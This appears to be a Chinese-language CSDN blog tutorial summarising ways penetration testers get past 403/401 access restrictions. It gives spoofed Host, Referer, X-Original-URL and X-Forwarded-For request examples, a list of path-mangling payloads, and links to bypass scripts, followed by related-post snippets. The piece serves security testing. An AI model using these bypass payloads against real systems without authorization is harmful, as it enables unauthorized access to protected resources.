渗透测试-渗透中403/401页面绕过的思路总结

已于 2023-01-20 00:31:27 修改
阅读量5.6k 收藏 62
点赞数 7
分类专栏: 渗透测试 文章标签: 安全性测试 web安全 安全
于 2022-08-29 23:58:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lza20001103/article/details/126581143
版权

渗透中403/401页面绕过的思路总结

文章目录

0x01 前言

做渗透时经常会碰到扫到的资产403的情况,特别是资产微乎其微的情况下,面试有时也会问到,这里做个总结!
在这里插入图片描述

0x02 利用姿势

1.端口利用

扫描主机端口,找其它开放web服务的端口,访问其端口,挑软柿子。

2.修改HOST

Host在请求头中的作用:在一般情况下,几个网站可能会部署在同一个服务器上,或者几个web系统共享一个服务器,通过host头来指定应该由哪个网站或者web系统来处理用户的请求。而很多WEB应用通过获取HTTP HOST头来获得当前请求访问的位置,但是很多开发人员并未意识到HTTP HOST头由用户控制,从安全角度来讲,任何用户输入都是认为不安全的。

修改客户端请求头中的Host可以通过修改Host值修改为子域名或者ip来绕过来进行绕过二级域名;首先对该目标域名进行子域名收集,整理好子域名资产(host字段同样支持IP地址)。先Fuzz测试跑一遍收集到的子域名,这里使用的是Burp的Intruder功能。若看到一个服务端返回200的状态码,即表面成功找到一个在HOST白名单中的子域名。我们利用firefox插件来修改HOST值,成功绕过访问限制。

3.覆盖请求URL

尝试使用X-Original-URL和X-Rewrite-URL标头绕过Web服务器的限制。通过支持X-Original-URL和X-Rewrite-URL标头,用户可以使用这俩请求标头覆盖请求URL中的路径,尝试绕过对更高级别的缓存和Web服务器的限制

Request
GET /auth/login HTTP/1.1
Response
HTTP/1.1 403 Forbidden

Reqeust
GET / HTTP/1.1
X-Original-URL: /auth/login
Response
HTTP/1.1 200 OK

或者:
Reqeust
GET / HTTP/1.1
X-Rewrite-URL: /auth/login
Response
HTTP/1.1 200 OK

4.Referer标头绕过

尝试使用Referer标头绕过Web服务器的限制。
介绍:Referer请求头包含了当前请求页面的来源页面的地址,即表示当前页面是通过此来源页面里的链接进入的。服务端一般使用Referer请求头识别访问来源。

Request
GET /auth/login HTTP/1.1
Host: xxx
Response
HTTP/1.1 403 Forbidden

Reqeust
GET / HTTP/1.1
Host: xxx
ReFerer:https://xxx/auth/login
Response
HTTP/1.1 200 OK

或者
Reqeust
GET /auth/login HTTP/1.1
Host: xxx
ReFerer:https://xxx/auth/login
Response
HTTP/1.1 200 OK

5.代理IP

一般开发者会通过Nginx代理识别访问端IP限制对接口的访问,尝试使用X-Forwarded-For、X-Forwared-Host等标头绕过Web服务器的限制。

X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwared-Host: 127.0.0.1
X-Host: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1

如:

Request
GET /auth/login HTTP/1.1
Response
HTTP/1.1 401 Unauthorized

Reqeust
GET /auth/login HTTP/1.1
X-Custom-IP-Authorization: 127.0.0.1
Response
HTTP/1.1 200 OK

6.扩展名绕过

基于扩展名,用于绕过403受限制的目录。

site.com/admin => 403
site.com/admin/ => 200
site.com/admin// => 200
site.com//admin// => 200
site.com/admin/* => 200
site.com/admin/*/ => 200
site.com/admin/. => 200
site.com/admin/./ => 200
site.com/./admin/./ => 200
site.com/admin/./. => 200
site.com/admin/./. => 200
site.com/admin? => 200
site.com/admin?? => 200
site.com/admin??? => 200
site.com/admin…;/ => 200
site.com/admin/…;/ => 200
site.com/%2f/admin => 200
site.com/%2e/admin => 200
site.com/admin%20/ => 200
site.com/admin%09/ => 200
site.com/%20admin%20/ => 200

7.扫描的时候

遇到403了,上目录扫描工具,扫目录,扫文件(记住,扫描的时候要打开探测403,因为有些网站的目录没有权限访问会显示403,但是在这个目录下面的文件,我们或许能扫描到并访问 )

8.最后补充再一些401和403 bypass的tips

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
Github上一些bypass 403的脚本

https://github.com/sting8k/BurpSuite_403Bypasser
https://github.com/yunemse48/403bypasser
https://github.com/devploit/dontgo403
https://github.com/daffainfo/bypass-403

以及403bypass的wiki
https://kathan19.gitbook.io/howtohunt/status-code-bypass/403bypass

在这里插入图片描述

炫彩@之星
关注
专栏目录
Web渗透测试-实战 方法 思路 总结
m0_55595611的博客
02-21 9592
尽可能的搜集目标的信息 端口信息 DNS信息 员工邮箱 信息搜集的分类 1、主动式信息搜集(可获取到的信息较多,但易被目标发现) 2、通过直接发起与被测目标网络之间的互动来获取相关信息,如通过Nmap扫描目标系统。 3、被动式信息搜集(搜集到的信息较少,但不易被发现) 4、通过第三方服务来获取目标网络相关信息。如通过搜索引擎方式来搜集信息。 搜索引擎 Google hacking 常用搜索语法: intitle:KEYWORD //搜索网页标题含有关键词的网页 intext:KEYWORD //搜索站
网络安全---渗透测试----业务逻辑漏洞(1-业务逻辑)
weixin_52796034的博客
10-23 610
业务逻辑是指一个实体单元为了向另一个实体单元提供服务,应该具备的规则与流程。业务逻辑是指在实际业务操作,通过对业务规则和规程的分析和抽象,确定业务处理的规则和步骤。业务逻辑通常由一组规则或者算法来描述业务流程,涉及到数据的处理、存储、分析和展示等方面,它是一个抽象的概念,在软件开发占据着重要的地位。在面向对象编程,业务逻辑通常被封装在对象的方法,以此来实现对数据的操作和处理。在Web应用程序,业务逻辑通常会包含在Controller层,用于处理用户请求和响应结果。
vue401页面——您没有权限访问当前页面,直接跳转登录页
weixin_44867717的博客
05-14 1218
【代码】vue401页面——您没有权限访问当前页面,直接跳转登录页。
403bypasser:自动执行403响应代码绕过的过程
05-25
403路人 自动执行403响应代码绕过的过程 描述 我注意到许多#bugbountytips描述了如何绕过403响应代码,因此当我收集所有方法时,我发现我需要40多个请求来处理所有方法。 因此,由于我喜欢自动化,因此我创建了此工具来完成繁重的工作。 但我也建议您稍后需要手动检查 该工具使用三种技术尝试绕过403响应代码,并在彩色输出给出每次重试的响应代码,以便于阅读: 1-使用多种请求方法(GET-POST- HEAD等) 2-在URL的末尾使用多个有效负载(鸣叫这些提示的人表示敬意) 3-将标头添加到请求(X-Forwarded-Host,X-Host ...等) 安装 : 1- git clone 2 CD 403旁路 3- pip3 install -r requirements.txt 用法 该工具带有两个参数:url-路径 python3 403bypasser.p
403 & 401 Bypasses
最新发布
菜鸟学渗透
10-11 1075
在我们做渗透测试或者攻防演练的时候,绕过HTTP状态码401(未授权)和403(禁止访问)的目的是为了绕过访问控制或权限限制,从而获取本不应有的访问权限,继续深入测试目标系统的其他部分。
403页面绕过
qq_63980959的博客
02-29 2704
拿到客户给的地址后,首先进行信息收集。端口信息收集,利用nmap进行全端口探测,发现除了80端口之外,还开放了一个web服务的8001端口,我们尝试使用8001端口访问(https://xxx.xxxx.com:8001),总是充满惊喜。可直接绕过IP限制进行访问。怕是这个运维要挨锤了,立马把这个问题,反馈给客户。https://iamadmixxx.xxx.xxx:8001/auth/login通过沟通,由于疏忽未下线8001端口,客户貌似认为这个很简单,关闭8001端口,下线业务后,让我们继续尝试后台能
渗透技巧之403绕过总结
薛定谔嘚喵博客
12-05 4855
绕过 403 Forbidden Error 表示客户端能够与服务器通信,但服务器不允许客户端访问所请求的内容。
403&401Bypass绕过
Caideyib的博客
11-09 648
修改Host值,如果网站做了基于域名或则和ip地址的访问控制策略限制一些敏感资源的访问,可以通过修改host值(比如通过信息收集到的子域,或者是目标的其他资产ip或者是内网 ip)都可以进行尝试从而绕过访问控制策略。403也有可能是waf导致,waf配置了禁止访问的文件名或者路径,此时可以尝试通过填充脏数据,大小写,双重URL编码或者fuzz路径来尝试bypass。如果网页不是直接从原始服务器获取,而是通过代理服务器转或代理传输的,代理服务器可以限制你访问私有信息,对一些敏感请求进行拦截。
渗透测试 403绕过~~~满满的干货
qq_59919573的博客
01-31 593
如果我们直接去访问/ylaq/Good这个目录可能是403Forbidden,那么我们可以尝试在后面加个‘/’,即访问/ylaq/Good/,有可能成功绕过,下面整理了一些常用的绕过情况。在Reqeust包也会包含有我们的IP来源信息,有的资源只允许它本机或者内网IP进行访问,这个时候我们就可以通过使用代理IP来绕过这一限制。可以通过X-Original-URL 和 X-Rewrite-URL请求表头覆盖url的路径,尝试绕过对更高级别的缓存和web服务器的限制。
网站渗透思路总结
03-22
- **防御规避**:学习如何绕过常见的防御机制,如防火墙规则、入侵检测系统(IDS)等。 #### 四、结语 网站渗透测试是一项复杂的任务,需要不断学习和实践。掌握上述提到的核心思路和技术将有助于提高渗透测试的有效...
红队专题-Web安全/渗透测试-注入攻击
aming小老弟
10-27 217
Sql Inject(SQL注入)概述 哦,SQL注入漏洞,可怕的漏洞。在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞, 其注入漏洞里面首当其冲的就是数据库注入漏洞。一个严重的SQL注入漏洞,可能会直接导致一家公司破产!SQL注入漏洞主要形成的原因是在数据交互,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句后,被当作SQL语句的一部分执行。从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。
bypass-403:一个简单的脚本,仅供旁路403使用
04-13
旁通403 一个简单的脚本,仅供旁路403使用 它也可以用来比较各种条件下的响应,如下图所示 用法 ./bypass-403.sh https://example.com admin ./bypass-403.sh website-here path-here 特征 在卷曲的帮助下使用13个已知的403绕过 安装 git clone https://github.com/iamj0ker/bypass-403 cd bypass-403 chmod +x bypass-403.sh sudo apt install figlet如果您无法看到屏幕截图的徽标 贡献者
BypassSuper:绕过403401或404
05-23
BypassSuper 一款针对403/401页面进行快速、高效尝试Bypass的扫描工具 ______ _____ | ___ \ / ___| | |_/ /_ _ _ __ __ _ ___ ___ \ `--. _ _ _ __ ___ _ __ | ___ \ | | | '_ \ / _` / __/ __| `--. \ | | | '_ \ / _ \ '__| | |_/ / |_| | |_) | (_| \__ \__ \/\__/ / |_| | |_) | __/ |
渗透测试--信息搜集报告
weixin_64655821的博客
07-20 2126
渗透测试之前期信息搜集 周淑涵2022/7/20
手把手教你绕过403访问资源
MachineGunJoe666
07-08 6851
在浏览网站的时候,经常会遇到403的状态码,表示不允许访问。该状态表示服务器理解了本次请求但是拒绝执行该任务,该请求不该重发给服务器。指的是服务器端有能力处理该请求,但是拒绝授权访问。这就意味着这里面有东西,我们只需绕过它。
403 Forbidden错误原因
沐雨金鳞
09-08 550
1、你的IP被列入黑名单。 2、你在一定时间内过多地访问此网站(一般是用采集程序),被防火墙拒绝访问了。 3、网站域名解析到了空间,但空间未绑定此域名。 4、你的网页脚本文件在当前目录下没有执行权限。 5、在不允许写/创建文件的目录执行了创建/写文件操作。 6、以http方式访问需要ssl连接的网址。 7、浏览器不支持SSL 128时访问SSL 128的连接。 8、在身份验证的过程输入了错误的密码。 9、DNS解析错误,手动更改DNS服务器地址。 10、连接的用户过多,可以过后再试。
一款针对于403响应的bypass工具-Bypass-403
siu~
01-17 707
一个简单的脚本,仅供自用,用于绕过 403
403ByPass总结
热门推荐
LainWith的博客
08-17 1万+
直接访问网站如下图,这里使用vulnhub靶机“Y0USEF: 1”为例,介绍几种403ByPass的手段。应该使用方法3探知网站,避免全程绕过导致渗透报告上少了漏洞一旦确认403 ByPass如果后期需要BP,直接采用方法3,或者直接方法2(关闭方法3的插件)如果后期不需要BP,直接方法1。...
"新手黑客的AV/EDR绕过技术:网络安全渗透测试
O documento "AV_EDR 绕过红队村 PT-BR.pdf" aborda técnicas de Bypass de AV/EDR no contexto de segurança cibernética e testes de penetração. O autor, Joas Antonio (C0d3Cr4zy), é um jovem de 19 an...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

炫彩@之星

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值